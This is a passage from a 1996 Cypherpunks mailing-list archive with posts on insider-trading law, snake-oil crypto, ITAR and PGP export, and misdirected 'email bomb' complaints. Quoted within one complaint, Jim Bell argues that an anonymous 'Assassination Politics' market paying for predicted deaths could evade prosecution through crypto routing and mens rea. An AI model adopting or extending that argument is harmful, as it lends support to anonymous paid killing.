A.M. on the 16th by the Ontario Minister of Mines and the report carried by the Northern Miner, parts of which had sporadically reached New York on the morning of the 16th through reports from Canadian affiliates to a few New York investment firms, are assuredly not the equivalent of the official 10-15 minute announcement which was not released to teh American financial press until after 10:00 AM. Crawford's orders had been placed before that. **Before insiders may act upon material information, such information must have been effectively disclosed in a manner sufficient to insure its availability to the investing public.** Particularly here, whre a formal announcement to the entire financial news media had been promised in a prior official release known to the media, all insider activity must await dissemination of the promised official announcement. Coates was absolved by the court below because his telephone order was placed shortly before 10:20 AM on April 16, which was after the announcement had been made public even though the news could not be considered already a matter of public information. 258 F.Supp at 288. This result seems to have been predicated upon a misinterpretation of dicta in Cady, Roberts, where the SEC instructed insiders to "keep out of the market until the estlablished procedures for public release of the information are carried out instead of hastening to execute transactions in advance of, and in frustration of, the objectives of the release," 40 S.E.C. at 915. The reading of a news release, which promoted Coates into action, is merely the first step in the process of dissemination required for compliance with the regulatory objective of providing all investors with an equal opportuinity to make informed investment judgements. Assuming that the contents of the official release could have been instantaneously be acted upon, at the minimum Coates should have waited until the news could reasonably have been expcted to appear over the media of widest circulation, the Dow Jones broad tape, rather than hastening to insure an advantage to himself and his broker son-in-law. -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From unicorn at schloss.li Wed Sep 25 20:53:00 1996 From: unicorn at schloss.li (Black Unicorn) Date: Thu, 26 Sep 1996 11:53:00 +0800 Subject: Possible snake oil? In-Reply-To: Message-ID: On Wed, 25 Sep 1996, Phil Fraering wrote: > > I ran across this at the web site of a New Orleans area web authoring > company. I checked with a friend of mine of long standing on this list, > and he assured me that the information was probably false. > > (Here it is...) > > > [deleted] has one of the fastest and most powerful web networks in the [...] > ObLegalQuestion: > > Should I have been less coy about the corporation name? It is their publication. Why should you be afraid of copying it? So long as you don't make allegations that are malicious. > > > Phil Fraering The above is the opinion of neither my internet > pgf at acadian.net service provider nor my employer. > 318/261-9649 > > -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From adam at homeport.org Wed Sep 25 21:14:57 1996 From: adam at homeport.org (Adam Shostack) Date: Thu, 26 Sep 1996 12:14:57 +0800 Subject: PGP plugin for Netscape? Message-ID: <199609260237.VAA02054@homeport.org> I could swear I read something about a PGP plugin called livepgp, and Altavista can't find it, and I can't glimpse it in my archives of the list. Anyone got a pointer? Please post to the list; making it more likely that a search engine will find this in the future, and we won't get a rash of 'me toos.' Thanks, Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From jimbell at pacifier.com Wed Sep 25 21:30:55 1996 From: jimbell at pacifier.com (jim bell) Date: Thu, 26 Sep 1996 12:30:55 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] Message-ID: <199609260141.SAA15334@mail.pacifier.com> At 07:24 AM 9/24/96 -0700, Dale Thorn wrote: >Lessee if I have this right, now. We have basically three scenarios: > >1. Allow the status quo to continue (the justice system scam now run by > Janet Reno/Louis Freeh types et al. >2. Allow the people some democracy in applying justice through AP. >3. Sometime in the future, build the Gort(?) robots, as in The Day The > Earth Stood Still, and let them do the job. > >Whatcha think? That's about it. I long ago noticed the similarity between AP and the fictional Gort. Problem is, Gort would have to be programmed. How would you write such a program? Governments would want their hand in it. They'd insist on "government exceptions" to rules, like: "All violence is forbiddden! (except for violence by duly authorized government employees!)" Not very practical. Jim Bell jimbell at pacifier.com From declan at well.com Wed Sep 25 21:40:32 1996 From: declan at well.com (Declan McCullagh) Date: Thu, 26 Sep 1996 12:40:32 +0800 Subject: Lexis and Privacy - Bill approaches. In-Reply-To: <960925181309_529562745@emout02.mail.aol.com> Message-ID: Dear PhneCards, Please stop using my email address as part of an inappropriate email bomb. If this continues, I will be forced to persecute your return email address. Now we don't want that to happen, do we? -Declan On Wed, 25 Sep 1996 PhneCards at aol.com wrote: > Date: Wed, 25 Sep 1996 18:13:24 -0400 > From: PhneCards at aol.com > To: declan at eff.org, cypherpunks at toad.com > Subject: Re: Lexis and Privacy - Bill approaches. > > Did you know this company is using your email address as part of > an unlawful email bomb? > > I would advise you to write to them at cypherpunks at toad.com > and owner-cypherpunks at toad.com and advise them to stop > using your email address for this type of activity. > > It is illegal to use a invalid return email address. If this continues, I > will > be forced to prosecute the return email address - which they are > making to look like you. > > Below is the letter that I received in my email box > ================================================= > > In a message dated 96-09-25 15:12:13 EDT, you write: > > >Subj: Re: Lexis and Privacy - Bill approaches. > >Date: 96-09-25 15:12:13 EDT > >From: declan at eff.org (Declan McCullagh) > >Sender: owner-cypherpunks at toad.com > >To: unicorn at schloss.li (Black Unicorn) > >CC: cypherpunks at toad.com > > > >This would be good if the bills were written well and thoughtfully. > >Unfortunately, they explicitly extend executive branch regulatory > >jurisdiction to the Net. At least the one I read did; I understand there > >are multiple versions. > > > >-Declan > > > > > >On Tue, 24 Sep 1996, Black Unicorn wrote: > > > >> > >> Pressure from the FTC Which fielded hundreds of complaints about Lexis and > >> the social security number scrap) has prompted members of the Banking > >> Committee to add provisions to the most recent spending bills which > >> protect personal information (including social security numbers, phone > >> numbers, addresses, and so forth) under the Fair Credit Reporting Act. > >> This limits access to this information to credit agencies and otherwise > >> authorized entities. (Of which I assume Lexis is not one). > >> > >> It's not great protection, but it's something. > >> > >> I urge everyone to take their own measures to protect personal data > >> regardless of what some piece of paper on a library shelf says is > >> protected. The only real protection is not to allow release of the data > >> in the first place. > >> > >> -- > >> I hate lightning - finger for public key - Vote Monarchist > >> unicorn at schloss.li > >> > > > > > >// declan at eff.org // I do not represent the EFF // declan at well.com // > > > > > > > > > >----------------------- Headers -------------------------------- > >From cypherpunks-errors at toad.com Wed Sep 25 15:11:39 1996 > >Return-Path: cypherpunks-errors at toad.com > >Received: from mailhub.MyMail.Com (mailhub.mymail.com [206.247.118.1]) by > >emin14.mail.aol.com (8.6.12/8.6.12) with SMTP id PAA10310 for > >; Wed, 25 Sep 1996 15:11:34 -0400 > >Received: from toad.com by mailhub.MyMail.Com (5.x/SMI-SVR4) > > id AA27335; Wed, 25 Sep 1996 13:11:11 -0600 > >Received: (from majordom at localhost) by toad.com (8.7.5/8.7.3) id FAA15636 > for > >cypherpunks-outgoing; Wed, 25 Sep 1996 05:06:43 -0700 (PDT) > >Received: from eff.org (declan at eff.org [204.253.162.3]) by toad.com > >(8.7.5/8.7.3) with ESMTP id FAA15631 for ; Wed, 25 Sep > >1996 05:06:39 -0700 (PDT) > >Received: (from declan at localhost) by eff.org (8.7.5/8.6.6) id FAA10228; Wed, > >25 Sep 1996 05:06:38 -0700 (PDT) > >Date: Wed, 25 Sep 1996 05:06:38 -0700 (PDT) > >From: Declan McCullagh > >To: Black Unicorn > >Cc: cypherpunks at toad.com > >Subject: Re: Lexis and Privacy - Bill approaches. > >In-Reply-To: > >Message-Id: > >Mime-Version: 1.0 > >Content-Type: TEXT/PLAIN; charset=US-ASCII > >Sender: owner-cypherpunks at toad.com > >Precedence: bulk > > > From deviant at pooh-corner.com Wed Sep 25 21:40:42 1996 From: deviant at pooh-corner.com (The Deviant) Date: Thu, 26 Sep 1996 12:40:42 +0800 Subject: Possible snake oil? In-Reply-To: Message-ID: On Wed, 25 Sep 1996, Phil Fraering wrote: > Date: Wed, 25 Sep 1996 16:00:40 -0500 (CDT) > From: Phil Fraering > To: cypherpunks at toad.com > Subject: Possible snake oil? > [Acual post deleted] > > ObLegalQuestion: > > Should I have been less coy about the corporation name? > > It won't make a difference either way: if he company does care, it takes all of 10 seconds to prove that the message could have been fakemailed anyway... As to whether or not they'd have grounds, no, they wouldn't, assuming you didn't actually edit the quote, and assuming you didn' (and you didn't) acually acuse them of anything. You merely quesioned if they were correct, and if so, how so... which is perfectly inocent. --Deviant Talking much about oneself can also be a means to conceal oneself. -- Friedrich Nietzsche From erp at digiforest.com Wed Sep 25 21:44:13 1996 From: erp at digiforest.com (Jay Gairson) Date: Thu, 26 Sep 1996 12:44:13 +0800 Subject: Public Schools In-Reply-To: Message-ID: > Nothing, but Dmitri has "different" standards of what is list-relevant than > many of us do. Ok, just wondering on that *shrug*. > > >So, basically your saying, since my parents cannot afford to pay for a > >private school for me, we are genetically inferior to those who can? > >Because hate tell ya, but I've ran into some major idiots that go to > >private schools. Also to consider that from the school I go to, last > >year we had two perfect sat scores (no problems missed). > > A minor point: An 800 SAT or Achievement score does _not_ mean "no problems > missed." There is some threshold for the percentage of right answers, which > varies from year to year and from test to test, above which the score is > marked "800." Don't ask me why they do this. (*) They did it because, the American students, where scoring worse than the Japanese students. And the with the 1600 they got a copy of the questiosn and answers, and the questions they missed, they didn't miss any. So... > > This should give you more hope and more determination to get a few 800s > when you take the exams. > Should, doesn't much, but should. > range (x10, of course). Of course, as Roger Gregory puts it, "Mensa is the > scum of the cream of the crop.") And he is partially right on that >) almost wholly.. But I know some non scum that are so *shrug* ok buh bye Erp From PhneCards at aol.com Wed Sep 25 22:09:17 1996 From: PhneCards at aol.com (PhneCards at aol.com) Date: Thu, 26 Sep 1996 13:09:17 +0800 Subject: An idle thought on CBC and block lengths Message-ID: <960925181213_529562658@emout15.mail.aol.com> Did you know this company is using your email address as part of an unlawful email bomb? I would advise you to write to them at cypherpunks at toad.com and owner-cypherpunks at toad.com and advise them to stop using your email address for this type of activity. It is illegal to use a invalid return email address. If this continues, I will be forced to prosecute the return email address - which they are making to look like you. Below is the letter that I received in my email box ================================================= In a message dated 96-09-25 15:52:17 EDT, you write: >Subj: An idle thought on CBC and block lengths >Date: 96-09-25 15:52:17 EDT >From: osborne at gateway.grumman.com (Rick Osborne) >Sender: owner-cypherpunks at toad.com >To: cypherpunks at toad.com > >So I was sitting bored at home and thinking to myself: CBC is cool. >Without the key, you're screwed because a single bit error propagates >throughout the entire message. But then I was thinking, yeah, but you can >still eventually get the ONE key. So I began to wonder what the difference >in security is between encrypting an entire M with just one K in CBC, or >encrypting M with permutations of K over specific block lengths. > >On the one hand you've got just one key, which makes it that much harder to >find in the keyspace. On the other hand, If evil interloper Eve gets her >hands it, she has to find all of the keys to get all of M. (Assuming she >is using brute force and can't necessarily find the master K to permute >into the subkeys.) > >The downsides are of course that on the one side you've got just one key, >and once you get it, you get M. But on the other hand, you can get any one >part of the message with less difficulty because of the higher number of >keys. And, of course, if your master K is easy to brute force, then it's >actually worse than the first option. > >Does anyone have opinions / knowledge of which is better? > > >____________________________________________________________ >Rick Osborne osborne at gateway.grumman.com >"The universe doesn't give you any points for doing things that are easy." > > > >----------------------- Headers -------------------------------- >From cypherpunks-errors at toad.com Wed Sep 25 15:51:46 1996 >Return-Path: cypherpunks-errors at toad.com >Received: from mailhub.MyMail.Com (mailhub.mymail.com [206.247.118.1]) by >emin14.mail.aol.com (8.6.12/8.6.12) with SMTP id PAA04207 for >; Wed, 25 Sep 1996 15:51:43 -0400 >Received: from toad.com by mailhub.MyMail.Com (5.x/SMI-SVR4) > id AA27411; Wed, 25 Sep 1996 13:47:22 -0600 >Received: (from majordom at localhost) by toad.com (8.7.5/8.7.3) id FAA16059 for >cypherpunks-outgoing; Wed, 25 Sep 1996 05:57:39 -0700 (PDT) >Received: from gateway.grumman.com (gateway.grumman.com [192.86.71.8]) by >toad.com (8.7.5/8.7.3) with SMTP id FAA16054 for ; Wed, >25 Sep 1996 05:57:32 -0700 (PDT) >Message-Id: <3.0b19.32.19960925085644.0068cb90 at gateway.grumman.com> >X-Sender: osborne at gateway.grumman.com >X-Mailer: Windows Eudora Pro Version 3.0b19 (32) >Date: Wed, 25 Sep 1996 08:56:45 -0400 >To: cypherpunks at toad.com >From: Rick Osborne >Subject: An idle thought on CBC and block lengths >Mime-Version: 1.0 >Content-Type: text/plain; charset="us-ascii" >Sender: owner-cypherpunks at toad.com >Precedence: bulk From markm at voicenet.com Wed Sep 25 22:14:16 1996 From: markm at voicenet.com (Mark M.) Date: Thu, 26 Sep 1996 13:14:16 +0800 Subject: Newsgroup proposal: misc.anonymous Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In an effort to get anonymity and message pools more widespread, I think it would be a good idea to establish a newsgroup for anonymous message pools that would get the same distribution as any other newsgroup in the "big 8". The "misc" hierarchy is probably the best place for such a newsgroup since it already carries groups like "misc.misc" and "misc.test". Does anyone have any suggestions or objections? Mark - -- PGP encrypted mail prefered. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv iQEVAwUBMknvNSzIPc7jvyFpAQHnmAf/SmvkV71/p3V2ZzCZApBk2TXD3wVifxi/ ljjRcuaGGs/iDJ1xKuTDGj5qIicM3Y3CSsnedS2g15RtAIpU7IdBKNsa4D55F2vI TJSElzqoqPMlAQRLq45v92DlG9d5zQopfqlT9bkGXZ1DDfTGg2q+F0HUqLYAZC1r DVU+iShjWUjX+0qxvKDClXSLLizdz6QHjTUTuE0PEdYf03KI0rqt/Dceh3iU2BWm bHYS20mHLv0fjdGMEVzBtul6mNfkcrYR2eyYxpWKtPtGzrw3NsSrI+ZYxT74I8S6 e2uB+Evnvl0dauLwhxWrdo4ILW0A9ekKfSrEVkRybBSKp8di2vwCqw== =cgnu -----END PGP SIGNATURE----- From PhneCards at aol.com Wed Sep 25 22:32:48 1996 From: PhneCards at aol.com (PhneCards at aol.com) Date: Thu, 26 Sep 1996 13:32:48 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! Message-ID: <960925181241_529563116@emout20.mail.aol.com> Did you know this company is using your email address as part of an unlawful email bomb? I would advise you to write to them at cypherpunks at toad.com and owner-cypherpunks at toad.com and advise them to stop using your email address for this type of activity. It is illegal to use a invalid return email address. If this continues, I will be forced to prosecute the return email address - which they are making to look like you. Below is the letter that I received in my email box ================================================= In a message dated 96-09-25 14:05:23 EDT, you write: >Subj: Re: Hallam-Baker demands more repudiations or he'll write! >Date: 96-09-25 14:05:23 EDT >From: jimbell at pacifier.com (jim bell) >Sender: owner-cypherpunks at toad.com >To: bdavis at thepoint.net (Brian Davis) >CC: cypherpunks at toad.com, jf_avon at citenet.net > >At 11:50 PM 9/24/96 -0400, Brian Davis wrote: >>On Tue, 24 Sep 1996, Rich Burroughs wrote: >> >>> >>> Anyone who mistakes the lack of "repudiations" for AP on the list for some >>> kind of tacit approval is not getting the whole picture, IMHO. >>> >>> Is this how journalists do their research nowadays -- "give me some info >or >>> I'll write something really bad about you that you'll regret?" Cool. I >>> guess I thought there might still be some kind of pursuit of the truth >>> involved. >>> >>> I personally don't have the time or energy to contribute to the AP >threads. >>> That != approval for the idea. >>> >>> I hope you include your above quote in your piece. >>> >> >>Amen to that. Add that at least one lawyer (and former prosecutor) on >>the list is confident that successful prosecutions will ensue is AP ever >>gets off the ground. > >I don't doubt that there will be harassment. (you can't deny that charges >would be brought even if it is tacitly agreed that no crime has been >committed; "the harassment-value" of such a prosecution would be desired >even if there is ultimately an acquittal.) AP will resemble, more than >anything, gambling. While gambling is illegal in some areas, it is quite >legal in others and there is no reason to believe that locales can't be >found in which an AP system could operate legally. > >Make American laws apply everywhere? That'll be hard to justify, unless you >want to unleash a world where an all people can be subject simultaneously to >the laws of EVERY country, should they choose to enforce them! Would you >like to be arrested in Red China for something you said years earlier in >America about their leadership? > > And are you ignoring the fact that the intentional isolation of one >participant from the knowledge of the actions and even the identity of the >others makes opportunities for prosecution on "conspiracy" charges mighty >slim. And since AP can operate across traditional jurisdictional >boundaries, you're going to have to explain how you can prosecute Person A >in Country B for giving a donation to an organization in Country C, to be >paid to a person D in country E for correctly predicting the death of person >F in country G, particularly when none of the identities of these people or >countries can be easily known given a well-crafted cryptographic and >message-routing system. > > Further, as you probably know as well as any, in order (at least, >supposedly!) to get a conviction you need to prove "mens rea," or "guilty >mind," and I suggest that none of the more passive participants in the AP >system have that. (The ones who DON'T pick up a gun, knife, bomb, poison, >etc.) Sure, they are aware that somewhere, sometime, somebody _may_ commit >a crime in order to collect a lottery, but they don't know who, what, when, >where, or how this will occur, if at all. (either before or after the fact!) > In fact, since it is possible for a target to collect the reward himself >(to be directed toward his designee, obviously) by committing suicide and >"predicting" it, it isn't certain to the other participants that there has >even been any sort of crime committed! > >Based on the mens rea requirement, I propose that there is plenty of room >for most of the participants to reasonably claim that they are guilty of no >crime. They have carefully shielded themselves and others from any guilty >knowledge, and presumably they are entitled to protect themselves in this >way. Morally, you could argue that these people are countenancing something >nasty, in the same sense that somebody could equally well argue that if you >buy a cheap shirt in Walmart you're partly responsible for sweatshop labor >in El Salvador. True, I suppose, but moral guilt does not always translate >into legal guilt. > > >> And yes, I've read Jim Bell's manifesto. The fact >>that no lawyer has dissected it from a legal standpoint has been used by >>Mr. Bell as support for the propostion that it is legal. > >I suggest that there is a greater likelihood that the "powers that be" will >just abandon all pretense of legality, and attempt to strike at the >participants if they can find them without benefit of any sort of trial. >This is a more plausible conclusion, because it cuts through all of the >legal difficulties which would hinder prosecution. In effect, a low-level >undeclared war. > > >Jim Bell >jimbell at pacifier.com > > >----------------------- Headers -------------------------------- >From cypherpunks-errors at toad.com Wed Sep 25 11:04:24 1996 >Return-Path: cypherpunks-errors at toad.com >Received: from mailhub.MyMail.Com (mailhub.mymail.com [206.247.118.1]) by >emin14.mail.aol.com (8.6.12/8.6.12) with SMTP id LAA03061 for >; Wed, 25 Sep 1996 11:04:18 -0400 >Received: from toad.com by mailhub.MyMail.Com (5.x/SMI-SVR4) > id AA26654; Wed, 25 Sep 1996 09:04:05 -0600 >Received: (from majordom at localhost) by toad.com (8.7.5/8.7.3) id AAA10103 for >cypherpunks-outgoing; Wed, 25 Sep 1996 00:55:24 -0700 (PDT) >Received: from mail.pacifier.com (root at mail.pacifier.com [199.2.117.164]) by >toad.com (8.7.5/8.7.3) with ESMTP id AAA10098 for ; >Wed, 25 Sep 1996 00:55:16 -0700 (PDT) >Received: from ip20.van1.pacifier.com (ip20.van1.pacifier.com [206.163.4.20]) >by mail.pacifier.com (8.7.6-pac/8.7.3) with SMTP id AAA14065; Wed, 25 Sep >1996 00:55:14 -0700 (PDT) >Message-Id: <199609250755.AAA14065 at mail.pacifier.com> >X-Sender: jimbell at mail.pacifier.com >X-Mailer: Windows Eudora Light Version 1.5.2 >Mime-Version: 1.0 >Content-Type: text/plain; charset="us-ascii" >Date: Wed, 25 Sep 1996 00:55:21 -0800 >To: Brian Davis >From: jim bell >Subject: Re: Hallam-Baker demands more repudiations or he'll write! >Cc: cypherpunks at toad.com, jf_avon at citenet.net >Sender: owner-cypherpunks at toad.com >Precedence: bulk From PhneCards at aol.com Wed Sep 25 22:33:47 1996 From: PhneCards at aol.com (PhneCards at aol.com) Date: Thu, 26 Sep 1996 13:33:47 +0800 Subject: Lexis and Privacy - Bill approaches. Message-ID: <960925181309_529562745@emout02.mail.aol.com> Did you know this company is using your email address as part of an unlawful email bomb? I would advise you to write to them at cypherpunks at toad.com and owner-cypherpunks at toad.com and advise them to stop using your email address for this type of activity. It is illegal to use a invalid return email address. If this continues, I will be forced to prosecute the return email address - which they are making to look like you. Below is the letter that I received in my email box ================================================= In a message dated 96-09-25 15:12:13 EDT, you write: >Subj: Re: Lexis and Privacy - Bill approaches. >Date: 96-09-25 15:12:13 EDT >From: declan at eff.org (Declan McCullagh) >Sender: owner-cypherpunks at toad.com >To: unicorn at schloss.li (Black Unicorn) >CC: cypherpunks at toad.com > >This would be good if the bills were written well and thoughtfully. >Unfortunately, they explicitly extend executive branch regulatory >jurisdiction to the Net. At least the one I read did; I understand there >are multiple versions. > >-Declan > > >On Tue, 24 Sep 1996, Black Unicorn wrote: > >> >> Pressure from the FTC Which fielded hundreds of complaints about Lexis and >> the social security number scrap) has prompted members of the Banking >> Committee to add provisions to the most recent spending bills which >> protect personal information (including social security numbers, phone >> numbers, addresses, and so forth) under the Fair Credit Reporting Act. >> This limits access to this information to credit agencies and otherwise >> authorized entities. (Of which I assume Lexis is not one). >> >> It's not great protection, but it's something. >> >> I urge everyone to take their own measures to protect personal data >> regardless of what some piece of paper on a library shelf says is >> protected. The only real protection is not to allow release of the data >> in the first place. >> >> -- >> I hate lightning - finger for public key - Vote Monarchist >> unicorn at schloss.li >> > > >// declan at eff.org // I do not represent the EFF // declan at well.com // > > > > >----------------------- Headers -------------------------------- >From cypherpunks-errors at toad.com Wed Sep 25 15:11:39 1996 >Return-Path: cypherpunks-errors at toad.com >Received: from mailhub.MyMail.Com (mailhub.mymail.com [206.247.118.1]) by >emin14.mail.aol.com (8.6.12/8.6.12) with SMTP id PAA10310 for >; Wed, 25 Sep 1996 15:11:34 -0400 >Received: from toad.com by mailhub.MyMail.Com (5.x/SMI-SVR4) > id AA27335; Wed, 25 Sep 1996 13:11:11 -0600 >Received: (from majordom at localhost) by toad.com (8.7.5/8.7.3) id FAA15636 for >cypherpunks-outgoing; Wed, 25 Sep 1996 05:06:43 -0700 (PDT) >Received: from eff.org (declan at eff.org [204.253.162.3]) by toad.com >(8.7.5/8.7.3) with ESMTP id FAA15631 for ; Wed, 25 Sep >1996 05:06:39 -0700 (PDT) >Received: (from declan at localhost) by eff.org (8.7.5/8.6.6) id FAA10228; Wed, >25 Sep 1996 05:06:38 -0700 (PDT) >Date: Wed, 25 Sep 1996 05:06:38 -0700 (PDT) >From: Declan McCullagh >To: Black Unicorn >Cc: cypherpunks at toad.com >Subject: Re: Lexis and Privacy - Bill approaches. >In-Reply-To: >Message-Id: >Mime-Version: 1.0 >Content-Type: TEXT/PLAIN; charset=US-ASCII >Sender: owner-cypherpunks at toad.com >Precedence: bulk From tcmay at got.net Wed Sep 25 22:38:27 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 26 Sep 1996 13:38:27 +0800 Subject: "Confessing to a felony" Message-ID: At 2:03 AM 9/26/96, Black Unicorn wrote: >On Wed, 25 Sep 1996, Igor Chudov @ home wrote: > >> > >> Soon I am going to be going overseas to Japan, and I want to take >> > >> my notebook with me so I can keep up with everything, however, I have >> > >> encrypted my hard drive and usually encrypt my mail. Is this in >> > >> violation of the ITAR to keep everything the same when I go over? >> >> Gentlemen, us customs does not give shit about what you take out >> on your diskettes. >> >> When I went to Russia recenty, I took PGP for DOS, and no one gave >> me any problem. >> >> IANAL > >Obviously not, you've just confessed to a felony. So? "Confessing to a felony" is meaningless, as I understand things. While BU is a lawyer, and I am not, I maintain "confessing to a felony" is meaningless without several necessary factors: a. interest by law enforcement that a crime has been committed and needs to be prosecuted b. evidence that the "confession" can be backed up by other evidence c. common sense Thus, if even former prosecutor Brian Davis, when he was a prosecutor, were to have "confessed to a felony" (for example, saying a bad word on a forum where minors might be present, under the CDA, and before it was put on semi-hold), his colleagues would just have snickered, thinking him crazy. As to the felony status of taking PGP to Russia, I think it's not a felony. The "personal use" exemption in the ITARs certainly makes taking PGP to _Western_ Europe an OK thing. Whether Russia is still considered to be worthy of an "exemption to the exemption," as it were, is unclear to me. Mostly, I think U.S. Customs doesn't care. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tcmay at got.net Wed Sep 25 22:47:51 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 26 Sep 1996 13:47:51 +0800 Subject: Public Schools Message-ID: At 11:40 PM 9/25/96, Jay Gairson wrote: >> A minor point: An 800 SAT or Achievement score does _not_ mean "no problems >> missed." There is some threshold for the percentage of right answers, which >> varies from year to year and from test to test, above which the score is >> marked "800." Don't ask me why they do this. (*) > >They did it because, the American students, where scoring worse than the >Japanese students. And the with the 1600 they got a copy of the >questiosn and answers, and the questions they missed, they didn't miss any. >So... Nonsense. Japanese students were not taking the CEEB and SAT tests in the 1950s, when the test methodologies were established. (As a point of fact, the Japanese have their own grueling exams, which bear no resemblance to the CEEB and SAT tests.) Nor were the number of Japanese-American students taking the test sufficiently plentiful in the 1950s and 60s to affect the methodology. So, this is your chance to present your evidence that the scoring methodology was changed in response to Japanese students doing better than American students. >ok >buh bye > >Erp On second thought.... --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From frantz at netcom.com Wed Sep 25 22:54:50 1996 From: frantz at netcom.com (Bill Frantz) Date: Thu, 26 Sep 1996 13:54:50 +0800 Subject: Mitsubishi MISTY LSI Message-ID: <199609260351.UAA02953@netcom8.netcom.com> > Nikkei English News, 24 September 1996. > > [Mitsubishi] fabricated the chip as a gate array using a > 0.5 micron CMOS process and its own proprietary > encryption algorithm MISTY. Operating at a maximum > input/output speed of 40 megahertz, the chip can handle > 32 bits per clock cycle. Does anyone have a reason not to consider this algorithm snake oil? e.g.: Was it developed by a well known cryptographer? Has it been vetted by someone/some organization with reputation? I other words, why should we trust it? ------------------------------------------------------------------------- Bill Frantz | "Cave softly, cave safely, | Periwinkle -- Consulting (408)356-8506 | and cave with duct tape." | 16345 Englewood Ave. frantz at netcom.com | - Marianne Russo | Los Gatos, CA 95032, USA From frantz at netcom.com Wed Sep 25 22:55:29 1996 From: frantz at netcom.com (Bill Frantz) Date: Thu, 26 Sep 1996 13:55:29 +0800 Subject: Private Information Retrieval Message-ID: <199609260351.UAA02957@netcom8.netcom.com> At 6:11 PM 9/25/96 -0400, PhneCards at aol.com wrote: >Did you know this company is using your email address as part of >an unlawful email bomb? As part of helping you get a clue about how the net works, I offer you the following information: You have been subscribed to a long-standing Internet mailing list. Mailing lists are also called a mail exploders because any mail sent to them is resent to all the subscribers. You should have gotten instructions on unsubscribing when you were subscribed. If you have lost them, Tim May has kindly given you and others in your situation some useful hints: >Send the correct word to the correct address, stated often here, and you >will be unsubscribed. > >--Tim May > > >(Hint: majordomo at toad.com, with message body of "unsubscribe cypherpunks" >(no quotes)) > Note that this is not a mail bomb attack. Each message is different and there are only about 100 of them of a normal day. ------------------------------------------------------------------------- Bill Frantz | "Cave softly, cave safely, | Periwinkle -- Consulting (408)356-8506 | and cave with duct tape." | 16345 Englewood Ave. frantz at netcom.com | - Marianne Russo | Los Gatos, CA 95032, USA From tcmay at got.net Wed Sep 25 23:09:02 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 26 Sep 1996 14:09:02 +0800 Subject: Lexis and Privacy - Bill approaches. Message-ID: Stop sending me messages like this. This is getting annoying. --TCM At 10:13 PM 9/25/96, PhneCards at aol.com wrote: >Did you know this company is using your email address as part of >an unlawful email bomb? > >I would advise you to write to them at cypherpunks at toad.com >and owner-cypherpunks at toad.com and advise them to stop >using your email address for this type of activity. > >It is illegal to use a invalid return email address. If this continues, I >will >be forced to prosecute the return email address - which they are >making to look like you. > >Below is the letter that I received in my email box >================================================= > >In a message dated 96-09-25 15:12:13 EDT, you write: > >>Subj: Re: Lexis and Privacy - Bill approaches. >>Date: 96-09-25 15:12:13 EDT >>From: declan at eff.org (Declan McCullagh) >>Sender: owner-cypherpunks at toad.com >>To: unicorn at schloss.li (Black Unicorn) >>CC: cypherpunks at toad.com >> >>This would be good if the bills were written well and thoughtfully. >>Unfortunately, they explicitly extend executive branch regulatory >>jurisdiction to the Net. At least the one I read did; I understand there >>are multiple versions. >> >>-Declan >> >> >>On Tue, 24 Sep 1996, Black Unicorn wrote: >> >>> >>> Pressure from the FTC Which fielded hundreds of complaints about Lexis and >>> the social security number scrap) has prompted members of the Banking >>> Committee to add provisions to the most recent spending bills which >>> protect personal information (including social security numbers, phone >>> numbers, addresses, and so forth) under the Fair Credit Reporting Act. >>> This limits access to this information to credit agencies and otherwise >>> authorized entities. (Of which I assume Lexis is not one). >>> >>> It's not great protection, but it's something. >>> >>> I urge everyone to take their own measures to protect personal data >>> regardless of what some piece of paper on a library shelf says is >>> protected. The only real protection is not to allow release of the data >>> in the first place. >>> >>> -- >>> I hate lightning - finger for public key - Vote Monarchist >>> unicorn at schloss.li >>> >> >> >>// declan at eff.org // I do not represent the EFF // declan at well.com // >> >> >> >> >>----------------------- Headers -------------------------------- >>From cypherpunks-errors at toad.com Wed Sep 25 15:11:39 1996 >>Return-Path: cypherpunks-errors at toad.com >>Received: from mailhub.MyMail.Com (mailhub.mymail.com [206.247.118.1]) by >>emin14.mail.aol.com (8.6.12/8.6.12) with SMTP id PAA10310 for >>; Wed, 25 Sep 1996 15:11:34 -0400 >>Received: from toad.com by mailhub.MyMail.Com (5.x/SMI-SVR4) >> id AA27335; Wed, 25 Sep 1996 13:11:11 -0600 >>Received: (from majordom at localhost) by toad.com (8.7.5/8.7.3) id FAA15636 >for >>cypherpunks-outgoing; Wed, 25 Sep 1996 05:06:43 -0700 (PDT) >>Received: from eff.org (declan at eff.org [204.253.162.3]) by toad.com >>(8.7.5/8.7.3) with ESMTP id FAA15631 for ; Wed, 25 Sep >>1996 05:06:39 -0700 (PDT) >>Received: (from declan at localhost) by eff.org (8.7.5/8.6.6) id FAA10228; Wed, >>25 Sep 1996 05:06:38 -0700 (PDT) >>Date: Wed, 25 Sep 1996 05:06:38 -0700 (PDT) >>From: Declan McCullagh >>To: Black Unicorn >>Cc: cypherpunks at toad.com >>Subject: Re: Lexis and Privacy - Bill approaches. >>In-Reply-To: >>Message-Id: >>Mime-Version: 1.0 >>Content-Type: TEXT/PLAIN; charset=US-ASCII >>Sender: owner-cypherpunks at toad.com >>Precedence: bulk -- [This Bible excerpt awaiting review under the U.S. Communications Decency Act of 1996] And then Lot said, "I have some mighty fine 